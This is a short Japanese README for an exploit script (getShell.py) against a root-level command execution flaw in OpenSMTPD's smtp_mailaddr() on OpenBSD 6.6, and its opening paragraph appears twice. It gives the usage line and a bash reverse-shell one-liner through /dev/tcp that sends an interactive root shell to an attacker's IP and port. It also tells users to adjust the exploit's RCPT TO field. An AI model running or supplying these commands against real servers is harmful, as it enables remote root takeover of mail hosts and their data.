
この脆弱性はOpenBSDのメールサーバであるOpenSMTPDの「smtp_mailaddr()」関数に存在し、OpenBSDバージョン6.6に影響を与えます。これにより、攻撃者はrootユーザーとして「sleep 66」のような任意のシェルコマンドを実行できます。
この脆弱性は、OpenBSDのメールサーバOpenSMTPDの「smtp_mailaddr()」関数に存在し、OpenBSDバージョン6.6に影響を与えます。これにより、攻撃者はrootユーザーとして「sleep 66」などの任意のシェルコマンドを実行できます。
python3 getShell.py <targetIp> <targetPort> <command>
リバースシェルが必要な場合は、次のように実行します。
python3 getShell.py <TargetIp> <TargetPort> 'bash -c "exec bash -i &> /dev/tcp/IP/PORT <&1"'
このエクスプロイト内のRCPT toやその他の部分(必要に応じて)を変更してください。
より明確な説明については、この記事を参照してください。
https://blog.firosolutions.com/exploits/opensmtpd-remote-vulnerability/